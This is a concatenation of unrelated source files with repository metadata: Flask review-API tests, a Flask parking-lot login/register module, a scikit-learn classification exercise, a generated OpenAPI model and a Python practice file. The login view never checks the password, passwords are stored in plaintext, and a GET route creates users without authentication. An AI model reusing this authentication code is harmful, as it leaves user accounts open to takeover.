'Submitter': 'tester',
'CompanyName': 'test_company'
}
resp = self.request_with_role('/review/create/123',
method='POST',
data=json.dumps(review))
# testing creation
self.assertEqual(resp.status_code, 201)
resp_data = json.loads(resp.data)
self.assertEqual(resp_data['message'], 'review created')
def test_create_fail(self):
""" Make a request w/o data """
resp = self.request_with_role('/review/create/123',
method='POST')
self.check_error(resp, 'DATA_NEEDED_FOR_REQUEST')
def test_approve_success(self):
""" Tests successfully updating a review to approved """
# creating review
rid = self.__create_review()
# approving review
resp = self.request_with_role('/review/approve/{}'.format(rid),
method='POST')
# testing approval
self.assertEqual(resp.status_code, 200)
approve_resp_data = json.loads(resp.data)
self.assertEqual(approve_resp_data['message'], 'review approved')
resp = self.request_with_role('/review/get/{}'.format(rid),
method='GET')
get_resp_data = json.loads(resp.data)
self.assertTrue(get_resp_data['data']['Approved'])
def test_approve_fail(self):
""" Tests successfully updating a review to approved """
# approving review
resp = self.request_with_role('/review/approve/{}'.format('WRONG'),
method='POST')
# testing approval
self.assertEqual(resp.status_code, 400)
resp_data = json.loads(resp.data)
self.check_error(resp, 'REVIEW_APPROVAL_FAILURE')
def test_get_success(self):
""" Tests returning a review """
get_review = {
'Rating': 10,
'CompanyName': 'test_company',
'Reviewer': 'Anonymous',
'Approved': False
}
rid = self.__create_review(get_review)
# getting review
resp = self.request_with_role('/review/get/{}'.format(rid))
# testing response
self.assertEqual(resp.status_code, 200)
resp_data = json.loads(resp.data)['data']
del resp_data['CompanyID']
self.assertDictEqual(resp_data, get_review)
def test_get_fail(self):
""" Tests returning a review that doesn't exist """
# getting a non-existent review
resp = self.request_with_role(
'/review/get/{}'.format('nonexistent_reivew'), method='GET')
self.check_error(resp, 'REVIEW_NOT_FOUND')
def test_edit_success(self):
""" Test that a review properly updates """
# creating a review
review = {
'Rating':10,
'Submitter': 'tester',
'CompanyName': 'test_company'
}
resp = self.request_with_role('/review/create/123',
method='POST',
data=json.dumps(review))
rid = json.loads(resp.data)['uid']
# updating review
new_rating = 5
review['Rating'] = new_rating
edit_resp = self.request_with_role('/review/edit/{}'.format(rid),
method='PATCH', data=json.dumps(review))
self.assertEqual(edit_resp.status_code, 200)
# getting review
resp_get = self.request_with_role('/review/get/{}'.format(rid),
method='GET')
self.assertEqual(resp_get.status_code, 200)
data_get = json.loads(resp_get.data)
self.assertEqual(data_get['data']['Rating'], new_rating)
def test_edit_fail(self):
""" Test that /edit fails with a bad id """
resp = self.request_with_role(
'/review/edit/{}'.format('nonexistent_review'),
method='PATCH')
self.check_error(resp, 'DATA_NEEDED_FOR_REQUEST')
resp = self.request_with_role(
'/review/edit/{}'.format('nonexistent_review'),
method='PATCH',
data=json.dumps({'Mock':'data'}))
self.check_error(resp, 'REVIEW_NOT_FOUND')
def test_delete_success(self):
""" Test that a review is properly deleted """
# creating a review
rid = self.__create_review()
# deleting review
delete_resp = self.request_with_role('/review/delete/{}'.format(rid),
method='DELETE')
self.assertEqual(delete_resp.status_code, 202)
delete_data = json.loads(delete_resp.data)
self.assertEqual(delete_data['message'],
'review deleted')
# trying to get the review
resp = self.request_with_role('review/get/{}'.format(rid),
method='GET')
self.check_error(resp, 'REVIEW_NOT_FOUND')
def test_delete_fail(self):
""" Test that /delete properly fails when there's no id match """
num_before = r.table(TABLE).count().run(self.rdb)
# deleting review
resp = self.request_with_role('/review/delete/{}'.format('test'),
method='DELETE')
self.check_error(resp, 'REVIEW_NOT_FOUND')
# confirming no reviews were deleted
num_after = r.table(TABLE).count().run(self.rdb)
self.assertEqual(num_before, num_after)
def test_list_success(self):
""" Test that reviews that are unapproved are returned """
# creating reviews
reviews_list = [
{'Rating':5, 'Reviewer': 'Anonymous', 'CompanyName': 'test_company'},
{'Rating':2, 'Reviewer': 'Anonymous', 'CompanyName': 'test_company'},
{'Rating':8, 'Reviewer': 'Anonymous', 'CompanyName': 'test_company'},
]
for review in reviews_list:
resp = self.request_with_role('/review/create/123',
method='POST',
data=json.dumps(review))
self.assertEqual(resp.status_code, 201)
resp = self.request_with_role('review/list',
method='GET')
self.assertEqual(resp.status_code, 200)
resp_data = json.loads(resp.data)
# make sure the list at the very least has as many as we created
self.assertGreaterEqual(resp_data['count'], len(reviews_list))
# checking that all created reviews were returned
returned_list = resp_data['data']
for review in returned_list:
self.assertFalse(review['Approved'])
del review['CompanyID']
del review['id']
del review['Approved']
del review['Date']
for review in reviews_list:
self.assertIn(review, returned_list)
if __name__ == '__main__':
unittest.main()
| [
"natebrennand@gmail.com"
] | natebrennand@gmail.com |
3a2ea89e484f2726eccb65d1780abd6d75ab0039 | bd3edde39bb88bf007e778ccbe0f50876debf73d | /app/core/views.py | 4b2d84ea627e237e42e4cfc61cc80e2c604cc25f | [] | no_license | raidyue/parkinglot_flask | 7c8f954a0452e38e8d811ea9f9648d702bc7f590 | ecf4422d75da5105395138bb24934d3a3af187cb | refs/heads/master | 2021-01-10T04:54:37.730574 | 2015-12-03T06:48:45 | 2015-12-03T06:48:45 | 47,187,762 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,077 | py | # encoding=utf-8
from flask import Blueprint, render_template, request, session, url_for, redirect, flash
from app.models import User, db
main_bp = Blueprint('main', __name__)
@main_bp.route('/hello')
def hello():
return render_template('helloworld.html')
@main_bp.route('/')
def index():
username = session.get('username', None)
return render_template('index.html', username=username)
@main_bp.route('/login', methods=['GET', 'POST'])
def login():
print 'method=%s' % request.method
if request.method == 'GET':
return render_template('login.html')
elif request.method == 'POST':
username = request.form['username']
password = request.form['password']
print username, password
user = db.session.query(User).filter_by(username=username).first()
if user:
session['username'] = user.username
return redirect(url_for('.index'))
else:
flash(u'该用户不存在')
return render_template('login.html')
else:
return url_for('.index')
@main_bp.route('/register', methods=['GET', 'POST'])
def register():
if request.method == 'GET':
return render_template('register.html')
elif request.method == 'POST':
username = request.form['username']
password = request.form['password']
if not User.is_exist(username):
u = User(username=username, password=password)
db.session.add(u)
db.session.commit()
session['username'] = username
return redirect(url_for('.index'))
else:
flash(u'该用户已存在')
return render_template('register.html')
else:
return url_for('.index')
@main_bp.route('/logout')
def logout():
if 'username' in session:
session.pop('username')
return redirect(url_for('.index'))
@main_bp.route('/add/<name>/<passwd>')
def create_user(name, passwd):
u = User(username=name, password=passwd)
db.session.add(u)
db.session.commit()
return 'success'
| [
"yxd506388664@163.com"
] | yxd506388664@163.com |
60b4567896b5ba43ae28d30f439247b2cde8e8d8 | bc9008d7b1f6032f392c24b791965404847573de | /tarefa_3.py | f6b0681911a38e334cb611763d53e468321f0772 | [] | no_license | korallin/minicurso_nlp | e5c907314c356200fef89fcfa0bf24d342fb15ed | 3dfa9f241571674466932bce0f7878b437ece038 | refs/heads/master | 2023-07-14T05:18:06.548732 | 2019-10-04T12:20:23 | 2019-10-04T12:20:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,467 | py | # Ola vamos criar
import pickle
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.pipeline import Pipeline
from sklearn.svm import LinearSVC
from sklearn.metrics import classification_report
from sklearn.tree import DecisionTreeClassifier
with open('itens.pkl', 'rb') as f_in:
items = pickle.load(f_in)
print(f"Carregamos um conjunto com {len(items)} itens")
metade = int(len(items)/2)
X_test, y_test = zip(*items[:metade]) # Vamos separar metade para teste
X_train, y_train = zip(*items[metade:]) # O restante vai ser usado para treino
classifier = DecisionTreeClassifier(class_weight='balanced')
# Preciso converter para um formato que o classificador entenda.
def convert_to_features(X):
resultados = []
for item in X:
# TODO: Fazer features para alimentar o sistema de aprendizado. Exemplo. O numero de palavras
feature_ltda = 0
if "LTDA" in item:
feature_ltda = 1
feature_joao = 0
if "JOAO" in item:
feature_joao = 1
feature_me = 0
if "ME" in item:
feature_me = 1
resultados.append([feature_ltda, feature_joao, feature_me])
return resultados
classifier.fit(convert_to_features(X_train), y_train)
# Testes
predicted_labels = classifier.predict(convert_to_features(X_test))
target_names = ['pessoa', 'empresa']
print(classification_report(y_test, predicted_labels, target_names=target_names))
| [
"bruno@potelo.com.br"
] | bruno@potelo.com.br |
227c65532562036f5e133f80f39c5b3e37744a30 | 0214ce4dd9c8973751120ced006ec90ddc10e0e6 | /xepmts_staging/models/inline_response20029.py | f37d1190293987f4bcc393b0a61685193252124f | [] | no_license | jmosbacher/pmts-staging-api-client | b9b4175a8ab52bd1c22a2845ab564cd0bd4d2e1c | d25cacc6c75b5d716414e08184c4a6bc205126f9 | refs/heads/master | 2022-11-08T09:18:38.371104 | 2020-07-01T14:52:46 | 2020-07-01T14:52:46 | 276,405,990 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,341 | py | # coding: utf-8
"""
PMT API
API for the XenonnT PMT database # noqa: E501
The version of the OpenAPI document: 0.1
Contact: joe.mosbacher@gmail.com
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from xepmts_staging.configuration import Configuration
class InlineResponse20029(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'items': 'list[XenonntTpcPmt]'
}
attribute_map = {
'items': '_items'
}
def __init__(self, items=None, local_vars_configuration=None): # noqa: E501
"""InlineResponse20029 - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._items = None
self.discriminator = None
if items is not None:
self.items = items
@property
def items(self):
"""Gets the items of this InlineResponse20029. # noqa: E501
:return: The items of this InlineResponse20029. # noqa: E501
:rtype: list[XenonntTpcPmt]
"""
return self._items
@items.setter
def items(self, items):
"""Sets the items of this InlineResponse20029.
:param items: The items of this InlineResponse20029. # noqa: E501
:type: list[XenonntTpcPmt]
"""
self._items = items
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, InlineResponse20029):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, InlineResponse20029):
return True
return self.to_dict() != other.to_dict()
| [
"joe.mosbacher@gmail.com"
] | joe.mosbacher@gmail.com |
c7040ddfb3234fa81c557c5b53c237e3a8c31aeb | 884bcd609959b27748570d3ea6b1b0942126db73 | /03 Longest Substring Without Repeating Characters.py | 24922e5c5625309f911402a9a1f557c4c58fbc09 | [] | no_license | hemxzp/leetcode | 9a7dbe94849ea51ee6b51fd3cb6238b37584aa87 | bf243269810869d28c7484667f46fb1cc0464005 | refs/heads/master | 2020-04-01T19:50:03.994795 | 2018-12-10T13:02:45 | 2018-12-10T13:02:45 | 153,573,868 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 547 | py | # -*- coding:utf-8 _*_
class Solution:
def lengthOfLongestSubstring(self, s):
"""
:type s: str
:rtype: int
"""
m=1
a=[]
if s=='':
return (0)
for i in s:
if i not in a:
a.append(i)
else:
while a[0]!=i:
a.pop(0)
a.pop(0)
a.append(i)
if len(a)>m:
m=len(a)
return (m)
ob=Solution()
print(ob.lengthOfLongestSubstring('pwwkew'))
| [
"1316437633@qq.com"
] | 1316437633@qq.com |
ca9d516a63d3e04ca632b57273b2672ee116ff83 | 393cd5f71ba672a532a70452fdd945b7d890ca8c | /codes/naive_bayes.py | 83fb15af04856f8d543fe14036f5e6c6bd44b142 | [
"MIT"
] | permissive | kushalsatya11/Automatic-Code-Complexity-Prediction | ccf8756b9d2e9a2703bfd45949753d2b9e4baab2 | b4e2b12896ac0b420232ebb330c8338bd12c2d8e | refs/heads/master | 2021-06-17T20:32:15.237225 | 2019-09-25T07:01:33 | 2019-09-25T07:01:33 | 203,235,119 | 0 | 1 | MIT | 2021-04-26T19:26:05 | 2019-08-19T19:17:52 | Java | UTF-8 | Python | false | false | 2,251 | py | import csv
import numpy as np
from sklearn.cluster import KMeans
from sklearn import tree
from sklearn.metrics import accuracy_score
from sklearn.naive_bayes import BernoulliNB
import matplotlib
import matplotlib.pyplot as plt
from sklearn.manifold import TSNE
from sklearn.model_selection import KFold
from scipy.stats import mode
from sklearn.utils import shuffle
from sklearn.metrics import precision_score, recall_score
from sklearn.feature_selection import SelectFromModel
arr = []
arr_complexities = []
arr_names = []
complexity_dictionary = {'n':0, 'n_square':1, 'logn':2, 'nlogn':3, '1':4}
color_mapping = {0:'r', 1:'g', 2:'b', 3:'y', 4:'m'}
file_to_complexity_mapping = {}
with open('./finalFeatureData.csv','rt') as f:
data = csv.reader(f)
count = 0
for row in data:
count = count + 1
if(count==1):
continue
name = row[-1]
features = row[0:14]
complexity = row[-2]
if(complexity==('n' or 'n_square')):
continue
for i in features:
i = (int)(i)
arr_names.append(name)
arr.append(features)
arr_complexities.append(complexity_dictionary[complexity])
arr = np.asarray(arr, dtype=float)
arr_complexities = np.asarray(arr_complexities)
# shuffle the data
arr, arr_complexities, arr_names = shuffle(arr, arr_complexities, arr_names, random_state=0)
no_of_variables = 14
scores = []
precisions = []
recalls = []
for i in range(1, no_of_variables):
array = arr[:, :i]
score = []
prec = []
rec = []
kf = KFold(n_splits=5, shuffle=True)
for train_index, test_index in kf.split(array, arr_complexities):
X_train, X_test = array[train_index], array[test_index]
y_train, y_test = arr_complexities[train_index], arr_complexities[test_index]
gnb = BernoulliNB()
gnb.fit(X_train, y_train)
y_predicted = gnb.predict(X_test)
# print(y_predicted)
acc_score = accuracy_score(y_test, y_predicted)
score.append(acc_score)
prec.append(precision_score(y_test, y_predicted, average='weighted'))
rec.append(recall_score(y_test, y_predicted, average='weighted'))
scores.append(max(score))
precisions.append(max(prec))
recalls.append(max(rec))
plt.plot(scores)
plt.savefig('nb_vs_vaiable_count.png')
print('Scores: ', scores)
| [
"shagun16088@iiitd.ac.in"
] | shagun16088@iiitd.ac.in |
203fa172f84ee4e08171567c7f92913a36514a6f | 0bbadd843b28df32fdb22f027f06313ebff8d839 | /es_index_create.py | 5fdb1d50457074c49640905072b50ef72d6a162a | [] | no_license | Quastrado/text_search_engine | 5ce256b34d056c177f7e3e9e2b534485a9ebb70e | 8ee8ab221307597d5075f2d0f5aca7d053a10639 | refs/heads/master | 2023-06-17T03:47:24.482037 | 2021-06-13T13:14:27 | 2021-06-13T13:14:27 | 372,085,035 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 466 | py | import json
from elasticsearch import Elasticsearch
from app.actions import BaseActions
from app.models import Post
from app.db.session import SessionLocal
# actions = BaseActions(Post)
session = SessionLocal()
posts = session.query(Post).all()
# es = Elasticsearch([{'host': 'localhost', 'port': 9200}])
# i = 0
# for instance in posts:
# body = json.dumps(instance.__dict__)
# es.index(index='posts', doc_type='_doc', id=i, body=body)
# i = i+1
| [
"Ataxyswriter@yandex.com"
] | Ataxyswriter@yandex.com |
fd1464a1341d4c5adf11605e34d1f027dd436fee | ff7a68c14d3139e199453d1c24874ee3af392fd9 | /utils/testll.py | 48e33d04cff34695f00702512de0068c030a0858 | [
"CC0-1.0"
] | permissive | patrickmmartin/owictrl | 0ce74aefc63abdac90d10a221bfd61979b004046 | c8ef7244a032b40a6ab4dac22fbed3e7f2902d5e | refs/heads/master | 2021-01-22T07:39:14.869943 | 2017-06-16T16:16:29 | 2017-06-16T16:16:29 | 28,648,848 | 1 | 0 | null | 2017-06-16T16:16:30 | 2014-12-30T23:18:29 | Python | UTF-8 | Python | false | false | 2,124 | py | #! /usr/bin/python
""" test cases for the mini language output """
import unittest
import edgelang
import edgell
class EdgeLangBaseTestCase(unittest.TestCase):
""" base class with setUp """
_blank_move = [0, 0, 0]
_LED_only = [0, 0, 1]
def setUp(self):
pass
class EdgeLangLLTestCase(EdgeLangBaseTestCase):
""" test class with most basic parse test """
def runTest(self):
""" implement runTest"""
instructions = edgelang.to_ll("D1.0")
edge_bytes = edgell.to_bytes(instructions[0])
self.assertEqual(edge_bytes, self._blank_move)
class EdgeLangLLTestResultCase(EdgeLangBaseTestCase):
""" test for format of returned dict """
def runTest(self):
""" implement runTest"""
instructions = edgelang.to_ll("M1+,M2-,D1.0")
edge_bytes = edgell.to_bytes(instructions[0])
self.assertEqual(edge_bytes, self._blank_move)
class EdgeLangLLLEDOffTestCase(EdgeLangBaseTestCase):
""" test for setting LED """
def runTest(self):
""" implement runTest"""
instructions = edgelang.to_ll(" L0 , D1 ")
edge_bytes = edgell.to_bytes(instructions[0])
self.assertEqual(edge_bytes, self._blank_move)
class EdgeLangLLLEDOnTestCase(EdgeLangBaseTestCase):
""" test for setting LED """
def runTest(self):
""" implement runTest"""
instructions = edgelang.to_ll(" L1 , D1 ")
edge_bytes = edgell.to_bytes(instructions[0])
self.assertEqual(edge_bytes, self._LED_only)
class EdgeLangInvalidTestCase(EdgeLangBaseTestCase):
""" reject negative durations """
@unittest.expectedFailure
def runTest(self):
""" implement runTest"""
instructions = edgelang.to_ll("A1,B1,C1")
edgell.to_bytes(instructions[0])
class EdgeLangDurationTestCase(EdgeLangBaseTestCase):
""" reject invalid directives """
@unittest.expectedFailure
def runTest(self):
""" implement runTest"""
instructions = edgelang.to_ll("M1,D-1")
edgell.to_bytes(instructions[0])
if __name__ == '__main__':
unittest.main()
| [
"patrickmmartin@gmail.com"
] | patrickmmartin@gmail.com |
4e2af1e710b0143771e5e7899d03b60112140c79 | c995aadb4d9e878f7315c7b180130f85c7760bd7 | /src/contract/user/getByIdUserContract.py | 0199dd6f4eb41ed91fb991fbde6dba20bd2dad75 | [] | no_license | machine-projects/SICON_API | 82366051f3dbe224f2b09fde5ebfd8c3a87cba2b | 00c941b44760c0a68f476abef424c19950233466 | refs/heads/master | 2023-03-30T00:02:06.029715 | 2021-03-27T20:59:59 | 2021-03-27T20:59:59 | 347,988,027 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 383 | py | from src.infra.model.resultModel import ResultErrorModel
class GetByIdUserContract(ResultErrorModel):
def __init__(self):
super().__init__()
def validate(self, _id):
if not _id:
self.add_error('id', 'id é obrigatorio.')
if not _id.isnumeric():
self.add_error('id', 'id precisa ser um inteiro.')
return self.valid()
| [
"felipe_toffoli1@hotmail.com"
] | felipe_toffoli1@hotmail.com |
63c9a0b1b02b8e131d836166d8ff40992a215c05 | a18d516ca6db6c9e69788851167dc6bead70de1d | /P3-concurrency/common.py | c0ec89f43d7d3e43745ad45967bf7f5391fcdfd7 | [] | no_license | YGYtl/python3-web-PC | d7080a386e2629465e08815468223f5a707588f8 | 5d64f7fb5b68563f84aaf0afd399d8cb0d1bed4b | refs/heads/master | 2022-09-27T07:54:54.983494 | 2020-05-31T02:52:06 | 2020-05-31T02:52:06 | 268,081,141 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,104 | py | import os
import time
import requests
from logger import logger
basepath = os.path.abspath(os.path.dirname(__file__)) # 当前模块文件的根目录
def setup_down_path():
'''设置图片下载后的保存位置,所有图片放在同一个目录下'''
down_path = os.path.join(basepath, 'downloads')
if not os.path.isdir(down_path):
os.mkdir(down_path)
logger.info('Create download path {}'.format(down_path))
return down_path
def get_links():
'''获取所有图片的下载链接'''
with open(os.path.join(basepath, 'flags.txt')) as f: # 图片名都保存在这个文件中,每行一个图片名
return ['http://192.168.157.134/flags/' + flag.strip() for flag in f.readlines()]
# flag.strip() 去除首尾空格; flag.strip('0') 去除首尾0
def download_one(image): # 为什么设计成接收一个字典参数,而不是三个位置参数? 方便后续多线程时concurrent.futures.ThreadPoolExecutor.map()
'''下载一张图片
:param image: 字典,包括图片的保存目录、图片的序号、图片的URL
'''
logger.info('Downloading No.{} [{}]'.format(image['linkno'], image['link']))
t0 = time.time()
resp = requests.get(image['link'])
filename = os.path.split(image['link'])[1]
with open(os.path.join(image['path'], filename), 'wb') as f:
f.write(resp.content) # resp.content是bytes类型,而resp.text是str类型
t1 = time.time()
logger.info('Task No.{} [{}] runs {} seconds.'.format(image['linkno'], image['link'], t1 - t0))
def download_one_starmap(path, linkno, link):
'''
下载一张图片
1、param path:图片的保存目录
2、param linkno: 图片序号
3、param link: 图片url
'''
logger.info('Downloading No.{} [{}]'.format(linkno, link))
t0 = time.time()
resp = requests.get(link)
filename = os.path.split(link)[1]
with open(os.path.join(path, filename), 'wb') as f:
f.write(resp.content)
t1 = time.time()
logger.info('Task No.{} [{}] runs {} seconds'.format(linkno,link,t1-t0))
| [
"ygy.cs06@outlook.com"
] | ygy.cs06@outlook.com |
a7bdc7e68f69e1ee5f6344a4c53f9201e381210e | 43b4874111ad43cc66f9a5974f58d6897e980757 | /34. Find First and Last Position of Element in Sorted Array.py | 45964ea8c74b898a6b8e20c6629c2ccf1c249913 | [] | no_license | backcover7/Algorithm | 39aa0444676ee7354c32e0cc1e1c16fcabe93ec4 | 8b0cb32550b14d1a9dc63d156c001445a58c2d2b | refs/heads/master | 2020-08-14T06:43:34.857421 | 2019-12-23T23:49:58 | 2019-12-23T23:49:58 | 215,116,039 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,333 | py | class Solution(object):
def searchRange_cheating(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
if len(nums) == 0: return [-1, -1]
if target in nums: index = first = nums.index(target)
else: return [-1, -1]
if first == len(nums)-1: return [len(nums)-1, len(nums)-1]
while (first+1<=len(nums)):
if first+1 == len(nums):
last = first
break
if nums[first+1] == target:
first += 1
elif nums[first+1] != target:
last = first
break
return [index, last]
def searchRange(self, nums, target):
if target not in nums:
return [-1, -1]
left, right = 0, len(nums)
while left < right:
middle = (left + right) // 2
if target < nums[middle]:
right = middle
elif target > nums[middle]:
left = middle
else:
break
i = middle
while i >= 0 and nums[i] == target:
i -= 1
j = middle
while j <= len(nums) -1 and nums[j] == target:
j += 1
return [i+1, j-1]
S = Solution()
print S.searchRange([5,7,7,8,8,10],8) | [
"noreply@github.com"
] | backcover7.noreply@github.com |
7b6f7484cb3c1c0a99d4139fa6e0a1b4a53cbb31 | 6452ffce36d1d50dbb27657398af4314ba73c0aa | /python/sqlite-benchmark-graph.py | 90612bef91573d686282d438380c1415e3b71cf0 | [] | no_license | laysakura/sqlite3_benchmark | 1bde4f37be88e20d8a7a385ab897bfe571f7ce3b | f125db9466f9467b7fbd877285e8bd2669fe5346 | refs/heads/master | 2016-09-06T09:06:43.350515 | 2012-11-20T12:55:22 | 2012-11-20T12:55:22 | 6,775,963 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,324 | py | #!/usr/bin/env python
import smart_gnuplotter
g = smart_gnuplotter.smart_gnuplotter()
import Config
import Util
def get_graph_file_name(var_graph_file_params):
ret = ""
for key in var_graph_file_params.keys():
ret += "%(key)s_%%(%(key)s)s--" % {"key": key}
return ret[:len(ret) - len("--")]
def get_title_from_var_params(var_params):
ret = ""
for key in var_params.keys():
ret += "%(key)s='%%(%(key)s)s' ; " % {"key": key}
return ret[:len(ret) - len(" ; ")]
def _get_var_graph_file_param_names():
(stdout_str, stderr_str) = Util.sh_cmd_sync(
"(cd %s/make ; make --quiet show_var_graph_file_params)" %
(Config.basedir))
return stdout_str.split()
def _get_var_plot_param_names():
(stdout_str, stderr_str) = Util.sh_cmd_sync(
"(cd %s/make ; make --quiet show_var_plot_params)" %
(Config.basedir))
return stdout_str.split()
def _get_param_keyvals(param_names):
ret = {}
for key in param_names:
value = g.do_sql(
Config.resultsDbPath,
"select distinct " + key + " from " + Config.resultsDbTable + ";",
single_col=1)
ret[key] = value
return ret
def get_var_graph_file_params():
param_names = _get_var_graph_file_param_names()
return _get_param_keyvals(param_names)
def get_var_plot_params():
param_names = _get_var_plot_param_names()
return _get_param_keyvals(param_names)
def get_where_clause(var_graph_file_params, var_plot_params):
ret = ""
for g_param in var_graph_file_params:
ret += "%(g_param)s='%%(%(g_param)s)s' and " % {"g_param": g_param}
for p_param in var_plot_params:
ret += "%(p_param)s='%%(%(p_param)s)s' and " % {"p_param": p_param}
return ret[:len(ret) - len("and ")]
def get_temp_table_sql():
return (
"""
-- Write `create temp table tmp_T0 ...'
"""
)
def plot(var_graph_file_params, var_plot_params):
## Temp table definition
init = get_temp_table_sql()
w = get_where_clause(var_graph_file_params, var_plot_params)
query = (
"select 'SQL'||sql_no, avg(real_time), stdev(real_time)" +
" from " + Config.resultsDbTable +
" where " + w +
" group by sql_no;"
)
vars_dict = var_graph_file_params.copy()
vars_dict.update(var_plot_params)
g.graphs(
(Config.resultsDbPath, query, init),
terminal=Config.graphTerminal,
output="%s/resultsGraph/%s" % (
Config.basedir,
get_graph_file_name(var_graph_file_params)),
graph_attr="""
set style fill solid 1.00 border 0
set style histogram errorbars gap 2 lw 1
set style data histogram
set xtics rotate by -45
set grid ytics
""",
graph_title=get_title_from_var_params(var_graph_file_params),
plot_title=get_title_from_var_params(var_plot_params),
using="2:3",
yrange="[0:]",
xlabel=Config.graphXlabel,
ylabel=Config.graphYlabel,
vars_dict=vars_dict,
graph_vars=var_graph_file_params.keys(),
)
def main():
## Get appropreate graph variable
var_graph_file_params = get_var_graph_file_params()
var_plot_params = get_var_plot_params()
## Elapsed time
plot(var_graph_file_params, var_plot_params)
if __name__ == "__main__":
main()
| [
"lay.sakura@gmail.com"
] | lay.sakura@gmail.com |
330d0f81dcb58d00bfd0329cfe9ee601c4e8999c | 867def0d5d7e14b8364c6d3cb281379a64255e0a | /venv/Scripts/pip3-script.py | 1c9fd9c5ee55604d3baf97ee0959f06455ffcebd | [] | no_license | abdo-fysal/cnn | a0d0a21db55b3b95ee8dfcdc5e013f7e43152f96 | 75d684883cd9942c87cbaf4eee01ebbdb5b78aa5 | refs/heads/master | 2021-01-25T10:06:12.303699 | 2018-02-28T20:46:39 | 2018-02-28T20:46:39 | 123,338,523 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | #!C:\Users\abdo\PycharmProjects\untitled1\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==9.0.1','console_scripts','pip3'
__requires__ = 'pip==9.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==9.0.1', 'console_scripts', 'pip3')()
)
| [
"abdo.faysal@yahoo.com"
] | abdo.faysal@yahoo.com |
c4a8c3340dd04fd502ece451bc4af09e878efb4a | 397ff57da9aa5ca08e159b75d36efb3896d6155e | /old_models/utils/torch_input.py | f5e3aca2f149880cfdfff8086092e1ab528baaeb | [] | no_license | antorhasan/bank_line_prediction | a25656a57dd7c13139783f288766181f5e60186b | be4b8584de522b6f4485382307707f0bc36b2cbe | refs/heads/master | 2022-12-10T19:07:09.928835 | 2022-03-04T21:32:11 | 2022-03-04T21:32:11 | 192,115,348 | 0 | 1 | null | 2022-12-08T11:47:50 | 2019-06-15T19:13:57 | Python | UTF-8 | Python | false | false | 599 | py | import torch
from torch.utils import data
class Dataset(data.Dataset):
'Characterizes a dataset for PyTorch'
def __init__(self, list_IDs, labels):
'Initialization'
self.labels = labels
self.list_IDs = list_IDs
def __len__(self):
'Denotes the total number of samples'
return len(self.list_IDs)
def __getitem__(self, index):
'Generates one sample of data'
# Select sample
ID = self.list_IDs[index]
# Load data and get label
X = torch.load('data/' + ID + '.pt')
y = self.labels[ID]
return X, y | [
"kaziantorhasan@gmail.com"
] | kaziantorhasan@gmail.com |
a003bcb38318a40c71739f4d1552601723b08b17 | 11aaeaeb55d587a950456fd1480063e1aed1d9e5 | /.history/test_20190626132733.py | 79accd38ca746ea23e96e964bef94a8f31ed415e | [] | no_license | Gr4cchus/Learn-Python-3-The-Hard-Way | 8ce9e68f6a91ea33ea45fe64bfff82d65422c4a8 | f5fa34db16cdd6377faa7fcf45c70f94bb4aec0d | refs/heads/master | 2020-05-17T23:18:29.483160 | 2019-06-26T18:42:52 | 2019-06-26T18:42:52 | 184,023,439 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,126 | py | # # class Foo:
# # answer = 42
# # f1 = Foo()
# # f2 = Foo()
# # print(f1.answer)
# # print(f2.answer)
# # # both will print 42
# # f1.answer = 84
# # Foo.answer = 21
# # print(f1.answer) # 84
# # print(f2.answer) # 21
# class Foo:
# def __init__(self):
# self.answer = 42
# f1 = Foo()
# f2 = Foo()
# # f2.answer = 4000
# Foo.answer = 21
# # f1.answer = 2000
# print(f1.answer)
# print(f2.answer)
# # both will print 42 still
class Scenes(object):
# def __init__(self):
# # self.starting_room = starting_room
# # self.locations = {
# # 'room1': Room1(),
# # 'room2': Room2()
# # }
map_list = [
'room1',
'room2',
'finish'
]
def start(self):
print("You are at the start")
print("Where would you like to go")
self.locations()
def room1(self):
print("You enter room 1")
print("Where would you like to go")
self.locations()
def room2(self):
print("You enter room 2")
print("Where would you like to go")
self.locations()
def finish(self):
print("You have finished")
exit(0)
def locations(self):
print("def locations:", self.map_list)
for i in self.map_list:
print(i)
cmd = {
'room1': room1,
'room2': room2,
}
def guessing_game(self):
print("Oh no a mini-game")
# class Map(Scenes):
# a = Scenes()
# map_dict = {
# 'room1': a.room1(),
# 'room2': a.room2(),
# }
# class Engine():
# def __init__(self, map):
